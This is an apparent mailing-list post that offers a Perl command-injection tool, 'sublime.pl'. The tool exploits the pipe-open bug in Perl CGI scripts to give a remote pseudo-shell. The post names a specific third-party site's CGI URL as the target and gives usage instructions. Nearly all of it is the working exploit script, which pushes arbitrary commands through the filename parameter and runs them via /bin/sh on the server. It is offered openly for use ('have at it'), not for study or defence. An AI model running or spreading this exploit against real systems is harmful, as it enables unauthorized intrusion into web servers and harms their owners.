<div>This works off the perl pipe read bug, you can just input the first and second parts of the web address (with http:// included) and it&#39;ll drop you at a shell.  When using cd you must use the absolute path because I was too lazy to do it the correct way. ;-).  I know this is pretty easy stuff, it works off those vulns that can just be exploited with a web browser, but this gives you a shell.  So have at it guys &amp; gals!  Had to resend because I got some message about my attachment being blocked.  Not sure if it really was, though, I&#39;ll send again anyway.  Hope this isn&#39;t spamming the list. =/</div>
<div><br></div><div>Site: <a href="http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&amp;desc=Stat+File">http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&amp;desc=Stat+File</a></div>
<div>Useage: ./<a href="http://sublime.pl">sublime.pl</a> &quot;<a href="http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=">http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=</a>&quot; &quot;&amp;desc=Stat+File&quot;</div>
<div><br></div><div>Should work on most perl cgi scripts that are vulnerable to | read bug.  Please note, it&#39;s not a &quot;real&quot; shell, but almost everything works, except things that won&#39;t go in one instance like cd-ing and env vars, etc.</div>
<div><br></div><div>Play nice!</div><div><br></div><div>--oxagast</div><div><br></div><div>[CODE]</div><div><div><br></div><div>#!/usr/bin/perl</div><div><br></div><div># adaptive cgi shell by oxagast</div><div><br></div>
<div>use LWP::Simple;</div><div>$part1 = @ARGV[0]; $part2 = @ARGV[1];</div><div>print &quot;Making buffer...\n&quot;;</div><div>for $bet (100..200) {</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>$bettwo = $bettwo . &quot;AAAA&quot; . $bet . &quot;AAAA\\\\n&quot;;</div>
<div>}</div><div>print &quot;Exploiting...\n&quot;;</div><div>$id = get(&quot;$part1\|id\|$part2&quot;);</div><div>$id =~ m/(uid=\d+\(.*\) gid=\d+\(.*\) groups=\d+\(.*\))/;</div><div>print &quot;Well shizzle my nizzle... shell by oxagast... use wisely \;\)\n\n&quot;;</div>
<div>$uid = $1;</div><div>print &quot;$uid\n&quot;;</div><div>while (0 == 0) {</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>print &quot;\$ &quot;;</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>$cmd = &lt;STDIN&gt;;</div>
<div><span class="Apple-tab-span" style="white-space:pre">        </span>chomp($cmd);</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>if ($cmd =~ m/cd (\/.*)/) {</div><div><span class="Apple-tab-span" style="white-space:pre">                </span>$dir = $1;</div>
<div><span class="Apple-tab-span" style="white-space:pre">        </span>}</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>if ($cmd eq &quot;cd ..&quot;) {</div><div><span class="Apple-tab-span" style="white-space:pre">                </span>$dir =~ s/(.*)\/.*/\/\1/;</div>
<div><span class="Apple-tab-span" style="white-space:pre">        </span>}</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>if ($cmd eq &quot;pwd&quot;) {</div><div><span class="Apple-tab-span" style="white-space:pre">                </span>$dirjunk = $dir;</div>
<div><span class="Apple-tab-span" style="white-space:pre">                </span>if ($dirjunk eq &quot;//&quot;) {</div><div><span class="Apple-tab-span" style="white-space:pre">                        </span>$dirjunk = &quot;/&quot;;</div><div><span class="Apple-tab-span" style="white-space:pre">                </span>}</div>
<div><span class="Apple-tab-span" style="white-space:pre">        </span>}</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>$dirjunk = &quot;cd $dir\;$cmd&quot;;<span class="Apple-tab-span" style="white-space:pre">        </span></div>
<div><span class="Apple-tab-span" style="white-space:pre">        </span>$cmdhex = unpack(&quot;H*&quot;,&quot;$dirjunk &amp;&gt;/tmp/cmdlnerr&quot;);</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>$cmdhex =~ s/(..)/\\\\x$1/g;</div>
<div><span class="Apple-tab-span" style="white-space:pre">        </span>get(&quot;$part1\|echo -e $bettwo &gt; /tmp/buff\|$part2&quot;);</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>$backjunk2 = get(&quot;$part1\|cat /tmp/buff\|$part2&quot;);</div>
<div><span class="Apple-tab-span" style="white-space:pre">        </span>@backjunk = split(&quot;\n&quot;, $backjunk2);</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>get(&quot;$part1\|echo -e \&quot;$cmdhex\&quot; &gt; /tmp/cmdln\|$part2&quot;);</div>
<div><span class="Apple-tab-span" style="white-space:pre">        </span>get(&quot;$part1\|/bin/sh /tmp/cmdln &gt; /tmp/cmdlerr\|$part2&quot;);</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>$backjunk_as = get(&quot;$part1\|cat /tmp/cmdlnerr\|$part2&quot;);</div>
<div><span class="Apple-tab-span" style="white-space:pre">        </span>@backjunk_split = split(&quot;\n&quot;, $backjunk_as);</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>$backjunk_wcl = get(&quot;$part1\|wc -l /tmp/cmdlnerr\|$part2&quot;);</div>
<div><span class="Apple-tab-span" style="white-space:pre">        </span>$backjunk_wcl =~ m/(\d+) \/tmp\/cmdlnerr/m;</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>$thismanylines = $1 - 1;</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>for $junknum (0..scalar(@backjunk_split)) {</div>
<div><span class="Apple-tab-span" style="white-space:pre">                </span>for $fuzz (10..100+$thismanylines) {</div><div><span class="Apple-tab-span" style="white-space:pre">                        </span>if ($backjunk[$junknum] =~ m/(AAAA\Q$fuzz\EAAAA)/) {</div>
<div><span class="Apple-tab-span" style="white-space:pre">                        </span>$middle = $1;</div><div><span class="Apple-tab-span" style="white-space:pre">                        </span>@backjunk[$junknum] =~ m/(.*)\Q$middle\E/;</div><div><span class="Apple-tab-span" style="white-space:pre">                        </span>@backjunk_split[$junknum] =~ s/$1//;</div>
<div><span class="Apple-tab-span" style="white-space:pre">                        </span>@backjunk[$junknum] =~ m/\Q$middle\E(.*)/;</div><div><span class="Apple-tab-span" style="white-space:pre">                        </span>@backjunk_split[$junknum] =~ s/$1//;</div>
<div><span class="Apple-tab-span" style="white-space:pre">                        </span>print &quot;$backjunk_split[$junknum]\n&quot;;</div><div><span class="Apple-tab-span" style="white-space:pre">                        </span>}</div><div><span class="Apple-tab-span" style="white-space:pre">                </span>}</div>
<div><span class="Apple-tab-span" style="white-space:pre">        </span>}</div><div>}</div></div><div><br></div><div>[/CODE]</div>